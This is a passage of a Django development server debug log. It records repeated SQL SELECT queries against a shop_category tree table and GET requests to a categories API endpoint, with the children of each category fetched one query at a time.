"shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:22:25,906 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:22:25,910 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:22:25,916 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:22:25,920 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:22:25] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:22:35,024 utils 20136 140506667599616 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:22:35,036 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:22:35,044 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:22:35,048 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:22:35,055 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:22:35,060 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:22:35,065 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:22:35,070 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:22:35,075 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:22:35,082 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:22:35,087 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:22:35,091 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:22:35,096 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:22:35,101 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:22:35,108 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:22:35,112 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:22:35,116 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:22:35,120 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:22:35,123 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:22:35,127 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:22:35,130 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:22:35,134 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:22:35,138 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:22:35,141 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:22:35,144 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:22:35,151 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:22:35,154 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:22:35,156 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:22:35,158 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:22:35,161 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:22:35,165 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:22:35,168 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:22:35,170 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:22:35,172 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:22:35,176 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:22:35,180 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:22:35,182 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:22:35,184 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:22:35,187 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:22:35,189 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:22:35,192 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:22:35,195 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:22:35,198 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:22:35,201 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:22:35,204 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:22:35,208 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:22:35] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:22:40,216 utils 20136 140506667599616 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:22:40,233 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:22:40,239 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:22:40,243 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:22:40,249 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:22:40,253 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:22:40,257 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:22:40,261 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:22:40,266 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:22:40,272 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:22:40,276 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:22:40,280 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:22:40,284 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:22:40,288 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:22:40,297 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:22:40,301 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:22:40,306 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 